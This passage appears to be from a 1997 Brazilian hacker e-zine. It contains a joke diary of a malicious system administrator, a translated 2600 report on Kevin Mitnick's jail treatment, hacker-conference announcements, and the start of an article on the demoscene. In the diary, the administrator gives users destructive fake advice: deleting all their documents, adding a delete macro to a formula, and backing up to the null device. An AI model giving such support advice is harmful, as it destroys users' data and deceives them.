Meu Deus! E a gente ainda deixa essas pessoas votarem e dirigirem?
8:12am
A Contabilidade chamou para dizer que nao conseguiam acessar a base de
dados de relatorios de despesas.
Eu dei a resposta Padrao dos Administradores de Sistema #112: "Engracado...
Comigo funcionou...".
Deixei eles pastarem um pouco enquanto eu desconectava minha cafeteira do
No-Break e conectava o servidor deles de volta.
Sugeri que eles tentassem novamente. Ah... Mais um usuario feliz...
8:14 am
O Usuario das 8:05 chamou dizendo que recebeu a mensagem: Erro no acesso ao
drive 0.
Disse a eles que isso era problema de SO e: transferi a ligacao para o
microsuporte.
11:00 am
Relativamente calmas, as ultimas horas.
Decidi reconectar o telefone do suporte para ligar pra minha namorada.
Ela disse que os pais dela virao pra cidade nesse fim-de-semana.
Pus ela "em-espera" e transferi a ligacao para o almoxarifado.
Que e' que ela esta' pensando?
Os torneios de "Doom" e "Myst" sao neste fim-de-semana!
12:00 pm
almoco.
15:30 pm
Retorno do almoco.
15:55 pm
Acordei da soneca.
Sonhos ruins me dao tremores.
Empurrei os servidores sem razao.
Voltei pra soneca.
16:23 pm
Outro usuario liga.
Quer saber como mudar fontes em um formulario.
Perguntei que chip eles estao usando.
Falei pra eles ligarem novamente quando descobrirem.
16:55 pm
Resolvi rodar a macro "Criar Salvar/Replicacao de Conflitos" para que o
proximo turno tivesse algo a fazer...
Terca
8:30 am
Terminei a leitura do log de suporte da noite anterior. Pareceram ocupados.
Tempos terriveis com Salvar/Replicacao de Conflitos..
9:00 am
Gerente de suporte chega. Quer discutir minha atitude. Cliquei no
PhoneNotes SmartIcon. "Adoraria, mas estou ocupado. ", gritei enquanto
pegava as linhas de suporte, que (misteriosamente) acenderam.
9:35 pm
O chefe da equipe de P&D precisa de ID para novos empregados.
Disse ele que precisava do formulario J-19R=3D9C9\\DARR\K1.
Ele nunca tinha ouvido falar de tal formulario.
Disse a ele que estava no banco de dados de FORMULARIOS ESPECIAIS.
Ele nunca ouvira falar de tal banco de dados.
Transferi a ligacao para o almoxarifado.
10:00 am
Ana ligou pedindo um novo ID.
Eu disse que precisaria da matricula, nome de depto, nome do gerente e
estado marital. Rodei @DbLookup nos bancos de dados de Controle de Doencas
e nao achei nada.
Disse a ela que o novo ID estaria pronto de noite.
Relembrando as licoes de "Reengenharia para Parceria de Usuarios",
ofereci-me para entregar pessoalmente em sua casa.
10:07 am
O cara do almoxarifado passou por aqui dizendo que estava recebendo
ligacoes estranhas ultimamente. Ofereci a ele um treino em Notes. Comecando
agora. Deixei ele olhando a console enquanto sai' para fumar.
13:00 pm
Voltei da pausa para o cigarro. O almoxarife disse que os telefones ficavam
tocando demais, entao ele transferia as ligacoes pra moca da cafeteria.
Comeco a gostar desse cara.
13:05 pm
Grande Comocao! Gerente de suporte cai num buraco aberto onde eu tinha
tirado os tacos, na frente da porta do seu escritorio. Falei pra ele da
importancia de nao entrar correndo na sala do computador, mesmo que eu
grite "Meudeus -- Fogo!!"
14:00 pm
A secretaria juridica liga e diz que perdeu a password. Pedi a ela que
cheque sua bolsa, chao do carro e no banheiro. Disse que provavelmente caiu
das costas da maquina. Sugeri que ela ponha durex em todas as entradas de
ar que ela ache no PC. Grunhindo, ofereci-me para lhe dar nova ID enquanto
ela colava os durex...
14:49 pm
O almoxarife voltou. Quer mais aulas. Tirei o resto do dia de folga.
Quarta
8:30 am
Detesto quando os usuarios ligam pra dizer que o chipset nao tem nada a ver
com fontes em um formulario. Disse a eles "claro, voces deviam estar
checando o "bitset" e nao "chipset". Usuario bobo pede desculpa e desliga.
9:10am
Gerente de suporte, com o pe engessado, volta ao escritorio. Agenda um
encontro comigo para 10:00am. Usuario liga e quer falar com o gerente de
suporte sobre terriveis socorros na mesa de suporte. Disse a eles que o
gerente estava indo a uma reuniao. As vezes a vida nos da' material...
10:00 am
Chamei o Luiz do almoxarifado pra ficar no meu lugar enquanto vou no
escritorio do gerente. Ele disse que nao pode me demitir, mas que pode
sugerir varios movimentos laterais na minha carreira. A maioria envolvida
com implementos agricolas no terceiro mundo. Falando nisso, perguntei se
ele ja' sabia de um novo bug que pega texto indexado dos bancos de dados e
distribui aleatoriamente todas as referencias.
A reuniao foi adiada...
10:30 am
Disse ao Luiz que ele esta' se saindo muito bem. Ofereci-me para mostra-lo
o sistema corporativo de PBX algum dia...
11:00 am
almoco.
16:55 pm
retorno do almoco.
17:00 pm
Troca de turno. Vou pra casa.
Quinta
8:00 am
Um cara novo (Jonas) comecou hoje. "Boa sorte", disse a ele.
Mostrei-lhe a sala do servidor, o armario de fios e a biblioteca tecnica.
Deixei-o com um PC-XT. Falei pra ele parar de choramingar. O Notes rodava
igual, tanto em monocromo quanto em cores.
8:45 am
Finalmente o PC do novato deu boot. Disse a ele que iria criar novo usuario
pra ele.
Setei o tamanho minimo de password para 64. Sai' pra fumar.
9:30 am
Apresentei o luiz ao Jonas. "Boa Sorte", comentou o Luiz. Esse cara nao e'
o maximo?
11:00 am
Ganhei do Luiz no domino. Luiz sai. Tirei o resto das pecas da manga
("tenha sempre backups").
Usuario liga, diz que servidor de contabilidade esta' fora do ar.
Desconecto o cabo Ethernet da antena do radio (melhor recepcao) e ligo de
volta no hub.
Disse a ele que tentasse novamente. Mais um usuario feliz!
11:55 am
Expliquei ao Jonas a politica corporativa 98.022.01
"Sempre que novos empregados comecam em dias que terminam em 'A' estao
obrigados a prover sustento e repouso ao analista tecnico senior do seu
turno"
Jonas duvida. Mostrei o banco de dados de "politicas corporativas".
"Lembre-se, a pizza e' de peperoni, sem pimenta!", gritei enquanto Jonas
pisa no taco solto ao sair.
13:00 pm
Oooooh! Pizza me da' um sono...
16:30 pm
Acordo de uma soneca refrescante. Peguei o Jonas lendo anuncios de emprego.
17:00 pm
Troca de turno. Desligo e ligo o servidor varias vezes (Teste do botao
ON-OFF...). Ate' amanha...
Sexta Feira
8:00 am
Turno da noite continua tendo problemas para trocar unidade de forca do
servidor.
Disse a eles que estava funcionando direito quando sai.
9:00 am
Jonas nao esta aqui ainda. Decidi que deveria comecar a responder as
chamadas eu mesmo.
9:02 am
Chamada de usuario.
Diz que a base em Sergipe nao consegue replicar.
Eu e Luiz determinamos que e' problema de fuso horario.
Mandei eles ligarem para Telecomunicacoes.
9:30 am
Meu Deus! Outro usuario! Eles sao como formigas, Dizem que estao em Manaus
e nao conseguem replicar com Sergipe.
Falei que era fuso horario, mas com duas-horas de diferenca.
Sugeri que eles ressetasse o time no servidor.
10:17 am
Usuario do Espirito Santo liga.
Diz que nao consegue mandar mail pra Manaus.
Disse pra eles setarem o servidor para 3 horas adiantado.
11:00 am
E-mail da corporacao diz para todos pararem de ressetar o time dos
servidores.
Troquei o "date stamp" e reenviei para o Acre.
11:20 am
Terminei a macro @FazerCafe. Recoloquei o telefone no gancho.
11:23 am
O Acre liga, perguntando que dia e' hoje.
11:25 am
Gerente de suporte passa pra dizer que o Jonas pediu pra sair.
"Tao dificil achar boa ajuda...", respondi.
O gerente disse que ele tem um horario com o ortopedista essa tarde e
pergunta se eu me impor em substitui-lo na reuniao semanal dos
administradores. "No problems", eu respondo.
11:30 am
Chamo Luis e digo que a oportunidade bate `a sua porta e ele e' convidado
para um encontro essa tarde.
"Claro, voce pode trazer seu jogo de domino", digo a ele.
12:00 am
almoco:
13:00 pm
Comeco backups completos no servidor unix. Redireciono o device para NULL
para o backup ser mais rapido.
13:03 pm
Backup semanal completo. Cara, como eu gosto da tecnologia moderna!
14:30 pm
Olho o banco de dados de contatos de suporte.
Cancelo o compromisso de 2:45pm.
Ele deve ficar em casa descansando.
14:39 pm
Outro usuario ligando.
Diz que quer aprender a criar um documento de conexao.
Digo a ele para rodar o utilitario de documentos CTRL-ALT-DEL
Ele disse que o PC rebootou. Digo a ele para chamar o microsuporte.
15:00 pm
Outro usuario (novato) liga. Diz que a macro periodica nao funciona.
Disse a ele para incluir a macro @DeleteDocument no final da formula e
prometi a ele mandar-lhe o anexo do manual que indica isso.
16:00 pm
Acabei de trocar a cor de frente de todos os documentos para branco.
Tambem setei o tamanho da letra para 2 nos bancos de dados de ajuda.
16:30 pm
Um usuario liga pra dizer que nao consegue ver nada em nenhum documento.
Digo a ele para ir no menu Edit, opcao Select all, e apertar a tecla Del e
depois refresh.
Prometi mandar-lhe a pagina do manual que fala sobre isso.
16:45 pm
Outro usuario liga. Diz que nao consegue ver os helps dos documentos.
Digo a ele que irei consertar. Mudei a fonte para WingDings.
16:58 pm
Conectei a cafeteira no hub Ethernet pra ver o que acontece...
Nada... (muito serio).
17:00 pm
O turno da noite apareceu. Digo a eles que o hub esta' agindo estranho
Desejo um bom fim-de-semana.
----------------------------------------------------------------
ULTIMAS NOTICIAS DO MITNICK
===========================
Update: Thursday, March 3, 1997 - traducao pagina www.2600.com/mitnick
Fazem agora dois anos que Kevin Mitnick foi preso em Carolina do Norte por
ser um hacker de computador "America's Most Wanted". Ate' este dia ele nao
foi ainda levado a julgamento e nao tem indicacao de qualquer especie sobre
o que o aguarda para o futuro.
Recentemente, Kevin foi mantido em solitaria por 4 dias por nenhuma
razao aparente. Uma coisa e' clara, porem. NAO foi porque ele tinha muitas
latas de atum, como foi dito na revista Wired(*). Aquela peca procurou
fazer um sarro da encrenca do cara e nao fez nada para chegar ao fundo da
historia. De acordo com a ordem de detencao, ele foi colocado na solitaria
porque era uma "preocupacao da seguranca". As autoridades de alguma forma
(sem nem procurarem na cela de Kevin) chegaram a conclusao de que ele
estava pronto para modificar um Walkman e transforma-lo num transmissor FM.
Eles estavam com medo de que ele fosse coloca-lo dentro de um seus
escritorios. Como Kevin Mitnick, sendo um prisioneiro, poderia ter ganho
acesso a um dos escritorios deles esta' alem da nossa capacidade de
compreensao. De qualquer forma, esta foi a razao pela qual ele foi levado
de sua cela.
Apos revistarem a mesma, guardas descobriram que ele tinha um ou duas
violacoes menores (**) incluindo muitas latas de atum. Nao foi a razao
inicial pela qual ele foi colocado na solitaria, porem. Desde seu retorno,
muito de sua propriedade (***) nao foi devolvido, incluindo numeros da 2600
e Phrack que Kevin considera pertinentes ao seu caso. Enquanto estava
metido na solitaria, todos os documentos legais (%) foram mais
provavelmente vistoriados pelas autoridades.
Enquanto ele estava capturado na Carolina do Norte, Kevin aceitou um
acordo que permitia assumir a culpa para uma contagem de possessao de 15
ou mais ESN/MINs, o que recentemente foi definido como "artigos de acesso".
Este acordo permitiu a ela ser transferido para a California onde poderia
ser sentenciado por esta e outras violacoes de soltura.
Originalmente, so' havia 23 acusacoes contra ele, uma por cada chamada
de fone celular que tinha feito. Cada uma dessas acusacoes tinha uma pena
maxima de 20 anos! Dentro do acordo, a sentenca variaria entre 2 e 8 meses
por chamada.
Ao retornar da Carolina do Norte, ele tambem foi acusado de seis
alegacoes que ele violou a condicional. Duas foram retiradas em abril de 96
e Kevin entrou com uma acao contra duas alegacoes adicionais ja' que eram
posteriores ao fim da condicional. Por estas alegacoes, as linhas de
sentenciamento sugerem um total de 4 a 6 meses. O governo quer ele na
cadeia por dois anos. Estes dois anos, mais os oito meses do acordo feito
na Carolina do Norte (que o governo americano quer botar tudo junto)
totalizam 32 meses.
Do que se conclui que Kevin pode servir 32 meses em prisao antes que
as acusacoes na California sejam encaminhadas. Obviamente, o logico seria
trazer todas as sentencas ao mesmo tempo. Mas o governo nao quer fazer
isso.
O advogado da promotoria (David Schindler) disse que se Kevin se
recusar a assinar o pedido de acordo, o governo poderia empurrar o dito
pelo pais para enfrentar acusacoes em outras jurisdicoes. Ele tambem foi
dito que ha' acusacoes contra ele do estado da Carolina do Norte aguardando
tao logo sua sentenca atual termine. O governo esta' procurando usar o caso
Mitnick para mandar uma mensagem para os hackers de computador de todo o
pais. Nesse exato instante, a unica mensagem que vemos e' de que alguem que
nunca foi provado ter danificado um sistema de computador ou ter tido
qualquer tipo de compensacao financeira esta' sendo mantido preso sem um
julgamento por gente bem poderosa.
E' tatica comum para a Promotoria ir atras de alguem tantas vezes
quanto necessario ate' conseguir a sentenca que eles querem. Se eles nao
conseguem a sentenca que querem na primeira rodada, eles rolam os dados de
novo no proximo distrito. E ja' que ninguem esta' questionando isto, eles
podem manter a coisa indefinidamente.
Acredita-se que uma vez que as autoridades finalmente consigam passar
por cima das acusacoes, vao fazer parecer que o Kevin roubou milhoes de
dolares em software. Mas representantes da Motorola, uma das companhias
involvidas, mantem que tal fraude nao ocorreu.
Imediatamente apos ser indiciado em 25 contagens em setembro de 96, o
advogado de Kevin preencheu um pedido para a folha de especificidades, que
e' basicamente u pedido p. ser mais especifico contra o que ele estava
sendo acusado. Kevin so'recebeu tambem uma pequena parcela do que foi
descoberto (qualquer tipo de documentos ou evidencia para ser usado contra
ele). Considerando que esteve dois anos preso, esta falha e' ultrajante.
A proxima seria no dia 15 de abril de 1997.
Littman, que escreveu "O jogo do fugitivo", da' um relato mais apurado da
coisa toda.
For a really good summary of the latest Mitnick happenings, check out
Jon Littman's Fugitive Game update site at:
http://www.well.com/user/jlittman/game/news.html
Voce pode escrever para Mitnick (dando uma forca ou pelo menos
pro cara saber que nao esta' so', abandonado no mundo) no endereco:
Kevin Mitnick 89950-012
P.O. Box 1500
Los Angeles, CA 90053-1500
E X C L U S I V E K E V I N M I T N I C K U P D A T E
"Eles jogaram o Kevin no buraco na terca", disse Saul Moore, um
interno no Centro de Detencao Metropolitano de Los Angeles. "Eles
disseram que e' porque ele esta' sendo investigado como risco de
seguranca. Foi dito que ele representa um perigo para a
instituicao. Ele pode ter dito alguma coisa sobre usar
computadores para alguem."
Moore disse que as autoridades levaram as calcas, revistas e
livros de Mitnick. "Ele esta'sentado na sua cela de cuecas." Eu
perguntei a Moore como ele sabia disso tudo. "Os dutos," explicou.
"Nos (prisioneiros) podemos nos comunicar."
Mitnick ligou no ano novo. "Eu estava na biblioteca as 10:30, na
sexta," disse quase imediatamente, me dando um resumo. "As 10:45
eu cheguei na minha cela. Eles nao me deixavam entrar na minha
unidade. Eu vi um dos policiais que conhecia. Ele disse, "voce ta'
numa m(*) seria, voce vai pro buraco".
Mitnick nao estava certo sobre o que que era. Um guarda estava
ensacando seus papeis legais, revistas e livros. Ele especulou que
queriam dar uma fucada na sua linha de defesa.
"E' por causa das latas de atum?" perguntou. O fussador de micros
nao comia muito da comida da prisao e amontoou 72 latas de atum na
sua cela.
"Nao. Eu nao posso te dizer", teria dito o guarda. A medida que os
guardas levaram Mitnick embora, ele gritou o numero do seu
advogado para um presidiario, que anotou, mas teve o papel tomado
por outro guarda. Nem iriam os guardas permitir que o proprio
Mitnick chamasse seu advogado.
Ele foi revistado, algemado e levado para a solitaria unidade de
confinamento da prisao, a cela 8. Nenhum dos guardas lhe diria o
que tava rolando. Trancaram-no no que e' chamado cela de quatro
pontas. "E' onde poem os presos mais incontrolaveis. Eles te
amarram numa mesa de metal," lembra Mitnick. "Eu estava com medo.
Eles me despiram e deixaram la', nu."
Mitnick "mucuzou" o numero do seu advogado atraves da
"Intervento", (duto de ventilacao usado p. comunicacao) na
esperanca que um amigo presidiario telefonasse seu advogado e a
familia pra pedir ajuda. Disse ele ter ouvido que "estava sendo
investigado como ameaca de seguranca," mas ele se perguntou tambem
se o governo nao estava "brincando" com ele.
"Eles acreditavam que eu tinha o conhecimento ou know how para
modificar um Walkman normal num transmissor"
Algum tempo depois das 17:00, entregaram p. ele um papel da
administracao da detencao que disse que ele estava sob investigacao
por uma "questao de seguranca". Mitnick foi pedido que assinasse
o documento, reconhecendo a posse do material confiscado: 16
envelopes contendo seus papeis legais e busca da internet,
revistas e artigos de radio amador, eletronica e computadores, seu
walkman, relogio e latas de atum.
Quase dez horas depois de cair na solitaria, Michelle Caswell, um
associado da firma de advogacia de Mitnick, chegou. A
"Interventilacao" funcionou. Os oficiais da prisao providenciaram
uma camiseta e short de prisao p. a visita. Caswell pediu que
fosse tambem fornecido uma escova de dentes e cobertor. Ela estava
recebendo historias conflitantes sobre porque Mitnick havia sido
colocado na solitaria. Um guarda disse que foi por causa das
latas de atum na cela; outro disse que foi por causa de segredos
que Mitnick tinha aprendido e a informacao que tinha guardada na
cela.
Foram quatro dias passados em confinamento na solitaria. Quando
saiu nao estava certo ainda qual a razao da blitz e tambem da
solitaria. Muito do material confiscado foram impressos da
internet que os amigos tinham enviado, material disponivel
publicamente. "eu ainda gostaria de chegar ao fundo da questao do
porque invadiram minha cela," me disse, sem o humor que uma vez
escutei na sua voz.. "foi isto para pegar meus papeis (legais) ou
um tratamento p me f(*)?"
Nos dias seguindo sua soltura Mitnick ouviu uma nova teoria sobre
o porque ele foi punido. "Agora estao dizendo que eu tinha
material legal demais na minha cela. Eles me disseram que foi por
causa das minhas notas sobre outros casos de hackers, todos os
numeros da 2600, o caso Neidorf. Eu estava anotando tudo para o
meu advogado."
O advogado de Mitnick se encontrou com um guarda e ouviu
finalmente porque o hacker foi despido, revistado e jogado na
solitaria. "Eles acreditavam que eu tinha o conhecimento ou know-
how para modificar um radio walkman num transmissor", disse.
[...]
"Ridiculo, eu nao tinha ferro de soldar ou outros componentes
necessarios" e alem disso "estou preso numa cela. Como vou colocar
o transmissor nos escritorios deles". Pra simplificar, nenhum
walkman modificado foi achado.
Quando o material legal de Mitnick foi devolvido (mas nao as
listagens da internet e outras possessoes) o hacker notou um
buraco no seu documento mais confidencial, a cronologia dos fatos
que preparou para o seu advogado. "E' muito suspeito,"disse
Mitnick. Eu ainda nao sei ate' hoje se eles copiaram meu material
legal (de defesa)."
NOTA DO BARATA ELETRICA: Comparado com o presidiario comum brasileiro,
ate' que o Kevin nao esta' apanhando muito. Mas quando voce pensa que isso
acontece nos EUA, que seria o maior exemplo de democracia, a coisa fica um
pouco mais seria. Esse tempo de prisao que ele sofreu ate' agora, quase
dois anos, nao vai contar quando ele receber a pena. E o sujeito ainda nao
foi acusado tecnicamente acusado de nada. O preso, de acordo com a
legislacao americana, (***) pode ou nao ter o direito de ter algo que chame
de propriedade, coisas pessoais. Papeis contendo informacoes necessarias
(%) para a defesa podem ser guardados na cela e estudados pelo detento. Mas
e' comum os presidiarios reclamarem de carcereiros que roubam esses
objetos, por gana, maldade ou amendrontar os presos. E obvio, tem coisas
que o preso nao pode possuir em sua cela, as vezes e' tolerada, as vezes
nao (tipo comida extra, bebida, etc).. Pelo menos foi o que entendi do
filme "grito de liberdade".
ADENDO: Ate' o fechamento desta edicao, nao havia noticias sobre como foi a
audiencia no dia 15/04 . O mais proximo de um relato era de que o
responsavel pela condicional de Mitnick havia deturpado alguns fatos. A
coisa toda foi adiada para mais tarde, outra audiencia. A revista 2600
montou uma lista de discussao (em ingles, parece obvio, mas tem muito cara
que precisa saber disso) para ajudar. O endereco para subscricao e':
majordomo@2600.com
E no texto, os dizeres:
subscribe mitnick
Nao precisa de nada no "subject".
Eles mandam uma carta com instrucoes para voce confirmar a inscricao e ..
pronto. Talvez o que mais ajude seja um postal dando uma forca pro cara,
que deve se achar sozinho no mundo.
==========================================================
ALGUNS ENCONTROS DE HACKERS NO MUNDO TODO
=========================================
Vao rolar alguns encontros de hackers num futuro proximo, melhor dizendo
8/agosto nos EUA e na Holanda, alem do Access All Areas na Inglaterra, em
julho e o Defcon em Las Vegas, nos EUA em julho tambem. Aqui vao alguns
anuncios. Se alguma revista se interessar em pagar as despesas de viagem em
troca de reportagens, to^ aceitando ofertas... Com a grande vantagem de que
ja' sou conhecido do Computer Underground Internacional (sair na 2600 3
vezes contando sobre o Brasil ajuda um pouco) e posso conseguir a palavra
dos caras bem mais facil...
HIP '97
http://www.hip97.nl
What is HIP?
HIP is an acronym for 'Hacking In Progress'. It will take place on the
Friday 8th, Saturday 9th and Sunday 10th of August 1997 at campsite
Kotterbos, Aakweg, Almere in The Netherlands. The campsite is about a
30 minutes drive from Amsterdam.
Remember 'Hacking at the End of the Universe' (HEU) in 1993? The
people that published Hack-Tic, a computer underground magazine in The
Netherlands, organized it. Hundreds of hackers, phone phreaks,
programmers, computer haters, data travellers, electro-wizards,
networkers, hardwarefreaks, techno-anarchists, communications junkies,
cyber- and cypherpunks, system managers, stupid users, paranoid
androids, Unix gurus, whizz kids and warez dudes spent three days
building their own network between their tents in the middle of
nowhere, located in the Flevopolder in The Netherlands.
HIP will be the sequel to HEU. A campsite full of PCs, laptops, and
Unix machines, all connected via an intertent Ethernet that is
connected to the Internet. People from all over The Netherlands and
other countries will come together to learn and discuss the benefits,
as well as the risks of new technologies. They'll listen to lectures,
join workshops, enjoy special presentations and, last but not least,
party, all of this in a friendly open-air environment of a very wired
campsite far away from the civilized world.
HIP will happen on the same days as Beyond HOPE, a hacker convention
in New York, organized by the people of 2600 Magazine. There will be
audio and video links between both events, and we're working on cool
gadgets to further enhance your sense of 'grassroots telepresence'.
This will be a twin-event in the true sense of the word.
Who is organizing HIP?
Once there was a little magazine in The Netherlands called 'Hack-Tic',
and it published wild ways to play tricks on the information
infrastructure of the world. The magazine doesn't exist anymore, but
most of the people that wrote articles for the magazine or helped
organize Hacking at the End of the Universe (1993) and even some of
the people that helped put up the Galactic Hacker Party (1989) are
still in touch with each other. The every-four-year-itch has gotten to
us again...
It's going to be quite a project to organize something that is better
than HEU, but we're not facing it alone. We'll get lots of people to
help us.
The hackers that were present at HEU have successfully infiltrated in
key positions to aid in the upcoming political takeover as was agreed.
Many have the agreed-upon provisions in their job contracts since
1993, stating they would need time off for the final strategic
meeting.
HIPcamp and HIPnet
There'll be no hotel rooms or anything like that so you'll want to
bring at least a tent and a sleeping bag to HIP, even if this means
you can't bring the paper-tape unit that came with your VAX 11/780.
We'll supply a campground, toilets, showers, good food and electrical
power (as close to 220V/50Hz as possible) and we'll do our best to
supply everyone who wants it with an Ethernet connection. You will
probably be able to trade wiring, extra outlets, Ethernet cards, and
the use of modular crimping tools for almost anything.
HIPcamp will open on August 5th, three days before HIP starts. If you
decide to join in that early expect pretty primitive circumstances. If
you don't care about that, or think that's the best part, you can help
build HIPnet and all other facilities.
HIP stuff
A lot can and will happen in the coming months, and we'll keep adding
new topics even during the event itself. But we're definitely going to
discuss the legal situation regarding encryption, as well as the
latest technical developments in this field. The current decay of the
Usenet, copyright issues, censorship as well as many other
legislative, social, political and technical issues surrounding
Internet will be discussed. Computer security, or the lack thereof
will also be a hot topic. We'll have research workshops (i.e. GSM and
chipcard security) and you can also join many 'how-to' workshops and
lectures where you can pick up on Linux (Unix you can run at home, not
built by Microsoft), perl (a very powerful computer language) and
many, many other topics.
Tired of all these lectures and workshops? Just sit down, smoke or
drink socially accepted substances, interact with other humans,
volunteer for kitchen work and have a good time. We've had people at
the previous event that were not into computers at all, and they had
fun.
We'd like to receive as many ideas from you as possible at this stage.
So if you (and some of your friends) want to organize a lecture or
workshop, please let us know. If you keep having this wacky dream
about some project or construction that would work really well in an
environment with lots of other freaks, this is your call to action. We
dream of an event with thousands of creators and no audience.
No audience?
We'll try to offer different ways for the Internet population to truly
interact with the events at HIP. Please get in touch if you'll have
some friends at your house and you want to have CU-SeeMe or other
connections to us. We'll also be broadcasting live and buffered feeds
of audio and video on the net. Mass-media coverage will be provided
for the interactively challenged.
Press
All press is welcome to visit HIP, but there will be a few strict
rules. All members of the press will pay the entrance fee, no
discussion about this. There will be a part of the campsite that is
off-limits to all press. No filming, photographing or recording is to
take place there. Some people like to have a press-free moment, some
have employment-related reason for shunning media attention.
What else?
Many more things could be said but it is still a bit early. The main
networking tent and the bar will be open 24 hours a day and we'll have
a depository to stash your laptops, backpacks and other valuables. We
haven't figures out the exact entrance fee, but, just like HEU, HIP is
going to be a non-profit event. And if you haven't guessed it yet: all
workshops and plenary events will take place in English.
I want to be HIP too!
Don't worry: you can be! Subscribe to the announcement mailing list.
It's spam-free and will only carry HIP announcements written by us.
You can also participate in the ongoing, yet slightly messy debate in
the newsgroup alt.hacking.in.progress. If you can't find the newsgroup
don't contact us. Refresh the grouplist in your newsreader or ask your
access provider to check their newsfeed.
Heavily sponsored by
XS4ALL
*88888888888888888888888888888888888888888888888888888888888888
Beyond HOPE
http://www.2600.com
The "Follow On" Conference to
Hackers On Planet Earth (HOPE)
http://www.hope.net
New York City
1997 August 8, 9, & 10
* About Beyond HOPE
Beyond HOPE is a conference of hackers, phreaks, and netizens.
Anyone is welcome, but we ask that you be prepared to listen at
least half as much as you talk.
* Where is Beyond HOPE being held?
The Puck Building is in New York City on Houston Street between
Lafayette and Mulberry. It is just south of Greenwich Village,
and on the border of the Soho district. There is a floor plan
available.
* Where to stay
Details on which hotels will be linked to the conference will
be announced soon in this space. In the meantime, here are some
nifty hotel links in New York City to give you an idea of what
to expect.
* Directions
Subway: Take the Number 1 Local to Houston St and walk east.
Take the Number 6 Local to Bleecker St and walk a block south.
Take the A, C, or E train to Spring St and walk two blocks
north. You're looking for the large building that says "The
Puck Building" on it in large, friendly letters. Scholars of
Shakespeare's "A Midsummer's Night Dream" will recognize the
statue of Puck.
Taxi: Tell the cabbie to go to Houston St and Lafayette.
Note: There will be a special 2600 meeting on Friday, August
8th from 5 pm to 8 pm at the Citicorp Center on 53rd and
Lexington. To get to the conference from there, just hope on a
downtown Number 6 train and get off at Bleecker Street.
* How to get involved
Get involved by e-mailing us. Be sure to include what you wish
to do at the conference.
* Planned events and other details
Lectures, Seminars, and "hands-on" demonstrations of various
techno-topics. What do you plan to do? (expect a hyper link
here when we have a schedule planned - it's not ready yet).
* Suggestions
Please suggest things yourself. E-mail us, and they may wind up
here. Suggestions received so far:
+ A seminar on "low bandwidth" access to the Internet from text
based terminals such as those at public libraries.
+ A local area network on-site!! And hooked up to the Internet.
+ Internet Links to the HIP Conference in The Netherlands being
held at the same time. Voice, data, and video links are
"in-work".
* About the Puck building
As everyone who really knows New York City agrees, the Puck
Building is one of our most exceptional landmarks.
Listed on the National Historic Register, this grand Romanesque
Revival structure was designed by Albert Wagner and built in
1885 for the J. Ottman Lithographic Company. Originally, the
land on which the building stands was farmland owned by
Nicholas Bayard. During the mid 1800's, the property held a
house occupied by the Sisters of Charity, which was purchased
and demolished in 1885 when construction of the current
building began.
The building's style reflects the Chicago School of
architecture which was known for steel frame construction,
horizontal bands of windows, and the skillful use of brick. In
the case of the Puck, an unusual type of thin-line English
brick was chosen for the facade. The building's exterior
projects a feeling of strength balanced by lightness and
graceful simplicity.
more on the Puck Building....
* About NYC
What more needs be said? It's New York City, after all. The
Bronx is up, and The Battery's down. Here's the Official New
York City Web Site to help you. You'll also want to get tourist
map s & brochures (if you have a high speed Internet link) from
the New York Convention and Visitors Bureau Home Page.
* BeyondHope FAQ
E-mail questions, and they will be answered, and might show up
here.
* How to Pre-register
Haven't gotten that far yet, but as you can see, we're thinking
about it.
* The Network
We will have at the very least a T1 connection to the outside
world. This promises to be one of the best network connections
ever at a hacker conference. Again, to get involved, e-mail us.
-------------------------------------
DEF CON V - Julho 11-13 - Las Vegas, Nevada - http://www.defcon.org
------------------
_________________________________________________________________
DEMO CODING: HACKING , ARTE , OU O QUE?
=======================================
Edward de Oliveira Ribeiro
Ola!
Eh incrivel como ,dentre todos os (novos) habitos culturais trazidos pela
Internet e BBS's mundo afora , o hacking tenha chamado tanta atencao.Eh...
"Computer Underground" soa bem aos ouvidos , embora seja frustante o
fim de jovens talentosos como (o superstar) Mitnick, Phiber Optik e cia.
Sera que todo fucador brilhante tem que ir pra cadeia? Faz parte do show?
Bem, sinceramente eu acredito que nao. E nao estou sozinho. Prova disso eh
o crescimento mundial da "demoscene".
Demo... O que?
Demoscene( literalmente cena demo) eh um movimento(?) onde jovens se
reunem em grupos para ensinar e aprender programacao ,alem de criarem
seus proprios programas. Muito parecido com a cena hacker ,nao? A diferenca
eh que neste caso os tais programas nao tem nada a ver com cracking e
sim com arte. Os tais demos nada mais sao do que programinhas
executaveis DEMOstrativos que tentam extrair o maximo do micro em materia
de computacao grafica e efeitos especiais.Ray tracing, rotacao 3D,
simulacao de fogo e morphing sao super explorados. Um p*** exercicio de
criatividade e programacao. O tamanho dos programas varia de 4k (as
chamadas Intros) a 2.0 mega e o estilo tambem(cada grupo de demo-coding
tem os seus proprios macetes de programacao e otimizacao de software que so
os membros do grupo conhecem).Vale ressaltar que nem todos os integrantes
dos grupos de demo-coding sao programadores,ou
melhor,"coders"(codificadores). Como os demos lancados muitas vezes sao
superproducoes eh muito comum (quase regra) encontrar artistas graficos e
musicos participando em postos em definidos.
Ao que parece esta eh uma cena antiga ,surgida nos tempos das BBS's ,
pois varios amigos meus dessa epoca virao ou tiveram algum programa de
demo-groups famosos como Future Crew.
A coisa parece que ta esquentando mesmo eh com a InterNet ,embora vc
precise de paciencia pra achar material sobre o assunto(dica:Procure no
Yahoo por "demoscene"). Pelo que pude constatar a maioria dos demo-groups
vem de paises europeus como a Finlandia(principalmente!!!) , Franca e
Belgica. O Brasil,ainda nao tem uma demoscene forte,mas isso eh so uma
questao de tempo,uma vez que a galera das BBS nao para de colocar no ar
sites para divulgar o assunto,sem falar nos demo-groups nacionais que estao
surgindo . Ah, quase ia esquecendo... um bom combustivel para toda essa
cena sao sem sombra de duvida as "parties"(festas) organizadas por e
para demo-groups.
Mas pode tirar da cabeca a ideia de alcool ,drogas e baderna, as
parties nada mais sao do que concursos a nivel local,nacional e ate
internacional(!) de demo-coding.Com comissao julgadora ,telao ,premios e
tudo o mais.
As vezes vai gente de toda a Europa para,por exemplo, a Belgica so pra
ver/participar da disputa realizada em varios niveis (tem ate de musica
mod/wav/midi). Alguns cobram uma pequena taxa de adesao para cobrir os
custos ,uma vez que algumas parties chegam durar uma semana inteira
varando a noite ( mulheres nao pagam! :-) ).
Existem aqueles demo-groups que ja se tornaram famosos tipo o citado
Future Crew,Complex,NoooN e outros de nomes esquisitissimos(obs:os membros
dos demo-groups tb sao identificados por apelidos). Os demos desses grupos
sao de fazer o Hans Donner e o Spielberg irem vender balinha no sinal de
transito de tao bem produzidos. Tanto eh assim que o demo acaba sendo
